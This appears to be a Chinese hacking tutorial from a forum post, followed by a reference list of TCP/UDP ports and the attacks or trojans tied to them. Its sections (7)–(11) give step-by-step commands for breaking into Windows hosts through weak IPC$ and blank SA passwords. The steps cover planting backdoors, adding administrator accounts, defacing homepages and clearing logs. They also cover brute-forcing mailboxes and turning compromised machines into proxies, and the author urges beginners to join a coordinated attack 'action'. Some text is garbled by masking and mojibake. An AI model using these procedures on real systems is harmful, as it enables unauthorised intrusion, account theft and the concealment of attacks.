作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。?

命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?

[password | *]] [/user:[domainname\]username] [[/delete] |?

[/persistent:{yes | no}]]?

参数介绍:?

键入不带参数的net use列出 *** 连接。?

devicename指定要连接到的资源名称或要断开的设备名称。?

\\computername\sharename服务器及共享资源的名称。?

password访问共享资源的密码。?

*提示键入密码。 /user指定进行连接的另外一个用户。?

domainname指定另一个域。?

username指定登录的用户名。?

/home将用户连接到其宿主目录?

/delete取消指定 *** 连接。?

/persistent控制永久 *** 连接的使用。?

C:\net use \\IP

C:\net view \\IP

我们已经看到对方共享了他的C,D,E三个盘

我们要做的是使用N *** STAT命令载入N *** 快取.

c:\nbtstat –R 载入N *** 快取

c:\nbtstat –c 看有无载入N *** 快取

现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的 *** 和网上领居的一样。

(7)IPC入侵

所有程序:流光

开始:在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。输入我们要破解的IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”,,扫描出结果以后,“IPC$主机”,选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测”

的窗体,把那两个选项都选了,然后点“选项” 为了加快弱口令扫描速度,这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿,结果出来了。比如我们探测出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命令吧,输入:

net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接

copy icmd.exe file://对方ip/admin$ || admin$是对方的winnt目录

net time file://对方IP/ || 看看对方的本地时间

at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序

telnet 对方ip 端口

我们也可以改网页:

net use \\ip\ipc$ "admin" /uesr:"admin" 回车。

出现“命令成功完成”。

然后输入“dir \\ip\c$\*.*”

看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面

输入“dir \\ip\c$\inetpub\wwwroot\*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.这些就是主页了,假如你黑页在C:下,就输入"copy 主页文件 \\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了,简单吧?

日志清除,断开连接 :

我们copy cl.exe ,clear.exe 上去,再执行,就可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use /delete

(8)超管SA空密码漏洞

使用的工具:流光IV

启动流光,按Ctrl+R。出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。点击“确定”,进行扫描,假设我们取得主机:127.0.0.1,然后点击“工具” —— SQL远程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接”,出现远程命令行的界面。

net user heiying heiying1 /add 填加一个heiying的帐号和密码heiying1

net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。

下面我们来做跳板:

打开cmd.exe,输入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令

显示命令成功完成。

上传srv.exe:

copy srv.exe \\127.0.0.1\admin$\system32

上传ntlm.exe:

copy ntlm.exe \\127.0.0.1\admin$\system32

启动服务:

首先用net time \\127.0.0.1

看看对方主机的时间,(假如回显\\127.0.0.1 的本地时间是上午12.00),然后我们用at \\2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。

一分钟后在本机命令提示符中输入:

telnet X.X.X.X 99

然后我们要启动NTLM.exe:

在telnet状态下直接输入ntlm回车。

显示:windows 2000 telnet dump,by assassin,all rights reserved.done!

然后从新启动对方主机的telnet服务:net stop telnet(先关闭telnet服务)再输入net start telnet(启动telnet服务)然后我们退出telnet,然后在命令行下输入telnet 127.0.0.1,依照提示,接着输入用户名:heiying,密码:heiying1,回车。这样,我们的跳板就做好了,简单吧?

(上面上传的srv和ntlm等东东还有一个简便 *** ,全都可以直接用流光工具菜单里的种植者上传,60秒后自动运行,不用敲命令!呵呵~~~~方便吧!)

(9)如何用流光破解信箱密码

这次的目标是21CN,运行流光IV,选择POP3主机----右键----编辑----添加,填上:pop.21cn.com,其他的就用默认吧!不用更改,确定就行了。到下一步,还是右键-----从列表中添加------选择一个字典,没有的到网上下载一个字典,或者到黑白 *** 去下载,我们用简单模式探测!这样速度比较快,然后就等着成果吧,上次我以下就破了5个邮箱出来。

(10)frontpage进行攻击

打开您自己的Frontpage,文件菜单下选择“打开站点”,然后在文件夹框里写入(http://不要漏掉)。按下“打开”按钮,一会后,出现了文件夹,成功了,现在就可以操作网页文件了。如果跳出错误信息,表示有密码,我们用以下,这是默认的密码文件,下载下来,找个解密器破密码吧!破出来后就还可以改网页。这个只能改该网页,没什么玩的。

(11)用肉鸡做SOCK5 *** 跳板

需要软件:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。

首先我们在命令提示符下建立IPC$管道:

net use \\127.0.0.1\ipc$ "密码" /user:帐号

通道建立好后,我们把srv.exe sss.exe ntlm.exe全部上传。

c:\copy srv.exe \\10.10.10.10\admin$

1 files copied!

c:\copy ntlm.exe \\10.10.10.10\admin$

1 files copied!

c:\copy sss.exe \\10.10.10.10\admin$

1 files copied!

复制完毕后,

看肉鸡上现在的时间:

c:\net time \\127.0.0.1

显示当前时间是 2002/4/13 晚上 09:00

我们来启动srv.exe

c:\at \\127.0.0.1 09:01 srv.exe

等到09:01后。我们来连接肉鸡:

c:\telnet 127.0.0.1 99

连上后显示:

c:\winnt\system32

接着我们启动NTLM.exe

c:\winnt\system32ntlm

显示:

Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.

Done!

C:\WINNT\system32

首先我们终止srv.exe的telnet服务:

C:\WINNT\system32net stop telnet

继续:

C:\WINNT\system32net start telnet

再启动TELNET。

OK,我们来登陆

c:telnet 127.0.0.1

*==========================================================

Microsoft Telnet

*==========================================================

c:

好了,一切顺利,我们现在正式开始做 *** :

c:sss.exe -install ---------开始安装

显示:

c:sksockserver installed!

来看看配置:

c:sss -config show

显示:

SkServer Port = 1813 ----开放服务的端口 ,我们记着这个1813端口哦

SkServer StartType: 3 - Manual ---服务启动方式

SkServer Enable Client Set Num:0 ---客户端的项目个数

SkServer Pass SkServer Number:0 ---经过SkServer的项目个数

来启动服务:

c:net start skserver

提示你正在启动,并且完成。

来检查一下是不是启动了:

c:net start -----------看看启动的服务列表

These Windows 2000 services are started:

Print Spooler

Server

Snake SockProxy Service ---------------就是它,呵呵!

System Event Notification

TCP/IP NetBIOS Helper Service

Telephony

Telnet

The command completed successfully.

c:_

好了,到这里我们已经做好了一个socks5 *** 了,我们自己的哦.OK,下面我们用sockscap来使用我们做 *** 。

安装好SocksCap后,我们在桌面上打开SocksCap V2,点开File选项选Settings...弹出卡片,在 SOCKS Server里面我们填肉鸡的IP:127.0.0.1,PortT填默认的1813端口,下面的我们选socks version 5,呵呵,和 Attempt local then remot,这是域名解析的顺序,先本地,然后才远程。设置完了点“确定”我们就可以使用了,添加应用程序到sockscap里面,点开那个"new"按钮,会弹出一个卡片,

Profile name :程序名,随便写。

Command Line: 命令行,点后面的Browse...找到你的程序路径

Working:填好上面那个,这个就自动加上.

这样我们就把程序加到SocksCap里面了。

现在们可以双击里面的程序来使用,也可以选住程序在点"Run"来运行。

好了,终于写完了,上面的内容都很简单,很适合初学者,还望高手们不好见笑,刚好听说这次5.1有很多联盟有所行动,希望上面的内容能教会一部分人,少走弯路,让更多的人参与这次行动。UNIX和LINUX由于自己的功力也还不够,还差很远,所以还不敢写。

懂 *** 的高手进来看看

端口可分为3大类:

1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服 务的协议。例如:80端口实际上总是HTTP通讯。

2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。

本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住:并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣,请参看本文的其它部分。0通常用于分析操作系统。这一 *** 能够工作是因为在一些系统中“0”是无效端口,当你试 图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为 0.0.0.0,设置ACK位并在以太网层广播。 1 tcpmux 这显示有人在寻找SGIIrix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp,guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux 并利用这些帐户。

7Echo你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。(参见Chargen) 另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。Harvest/squid cache将从3130端口发送UDPecho:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

11 sysstat这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似再说一遍:ICMP没有端口,ICMP port 11通常是ICMPtype=1119 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击伪造两 个chargen服务器之间的UDP由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。

21 ftp最常见的攻击者用于寻找打开“anonymous”的ftp服务器的 *** 。这些服务器带有可读写的目录。Hackers或tackers利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。

22 sshPcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)还应该注意的是ssh工具包带有一个称为ake-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632 (十六进制的0x1600)位交换后是0x0016(使进制的22)。

23 Telnet入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。

25 *** tp攻击者(spammer)寻找 *** TP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。 *** TP服务器(尤其是sendmail)是进入系统的最常用 *** 之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。

53 DNSHacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。 需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种 *** 穿透防火墙。

67和68 Bootp和DHCPUDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件

79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。

98 linuxconf 这个程序提供linuxboxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuidroot,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。 此外因为它包含整合的服务器,许多典型的HTTP漏洞可

能存在(缓冲区溢出,历遍目录等)109 POP2并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在

110 POP3用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。

111 sunrpc portmap rpcbind Sun RPCPortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常 见RPC服务有:pc.mountd, NFS, rpc.statd, rpc.c *** d, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供 服务的特定端口测试漏洞。记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

113 Ident auth .这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, *** TP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回T,着将回停止这一缓慢的连接。

119 NNTP news新闻组传输协议,承载USENET通讯。当你链接到诸如:news.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。

135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end- point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用 机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运 行Exchange Server吗?是什么版本? 这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻 击直接针对这个端口。

137 NetBIOS name service nbtstat (UDP)这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节 139 NetBIOS File and Print Sharing

通过这个端口进入的连接试图获得NetBIOS/ *** B服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。 大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5 VisualBasicScripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。

143 IMAP和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。Morris蠕虫以后这还是之一次广泛传播的蠕虫。这一端口还被用于IMAP2,但并不流行。 已有一些报道发现有些0到143端口的攻击源于脚本。

161 SNMP(UDP)入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。 SNMP包可能会被错误的指向你的 *** 。Windows机器常会因为错误配置将HP JetDirect rmote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)查询sysName和其它信息。

162 SNMP trap 可能是由于错误配置

177 xdmcp 许多Hacker通过它访问X-Windows控制台,它同时需要打开6000端口。

513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供 了很有趣的信息

553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procedure call)系统。Hacker会利用这些信息进入系统。 600 Pcserver backdoor 请查看1524端口一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.

635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP 的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。

1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接 *** ,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着之一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”查看,每个Web页需要一个新端口。

1025 参见1024

1026 参见1024

1080 SOCKS 这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。

WinGate是一种常见的Windows个人防火墙,常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

1114 SQL 系统本身很少扫描这个端口,但常常是sscan脚本的一部分。

1243 Sub-7木马(TCP)参见Subseven部分。

1524 ingreslock后门 许多攻击脚本将安装一个后门Sh*ll 于这个端口(尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本,如statd,ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试Telnet到你的机器上的这个端口,看看它是否会给你一个Sh*ll 。连接到600/pcserver也存在这个问题。

2049 NFS NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端口。

3128 squid 这是Squid HTTP *** 服务器的默认端口。攻击者扫描这个端口是为了搜寻一个 *** 服务器而匿名访问Internet。你也会看到搜索其它 *** 服务器的端口:

000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户(或服务器本身)也会检验这个端口以确定用户的机器是否支持 *** 。请查看5.3节。

5632 pcAnywere你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能得 *** (译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。

6776 Sub-7 artifact 这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过 *** 线控制另一台机器,而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)6970 RealAudio

RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置13223 PowWow PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。

17027 Conducent这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。

Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载:

机器会不断试图解析DNS名—ads.conducent.com,即IP地址216.33.210.40 ;

216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(译者:不知NetAnts使用的Radiate是否也有这种现象)

27374 Sub-7木马(TCP) 参见Subseven部分。

30100 NetSphere木马(TCP) 通常这一端口的扫描是为了寻找中了NetSphere木马。

31337 Back Orifice “eliteHacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即 3=E, 1=L, 7=T)。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,其它的 木马程序越来越流行。

31789 Hack-a-tack 这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT,Remote Access Trojan)。这种木马包含内置的31790端口扫描器,因此任何31789端口到317890端口的连 接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文件传输连接)

32770~32900 RPC服务 Sun Solaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将 portmapper置于这一范围内,即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。 扫描这一范围内的端口不是为了寻找portmapper,就是为了寻找可被攻击的已知的RPC服务。

33434~33600 traceroute 如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。参见traceroute分。

41508 Inoculan早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见

端口1~1024是保留端口,所以它们几乎不会是源端口。但有一些例外,例如来自NAT机器的连接。 常看见紧接着1024的端口,它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。 Server Client 服务描述

1-5/tcp 动态 FTP 1-5端口意味着sscan脚本

20/tcp 动态 FTP FTP服务器传送文件的端口

53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。

123 动态 S/NTP 简单 *** 时间协议(S/NTP)服务器运行的端口。它们也会发送到这个端口的广播。

27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。

61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器(IP asquerade)

0条大神的评论

发表评论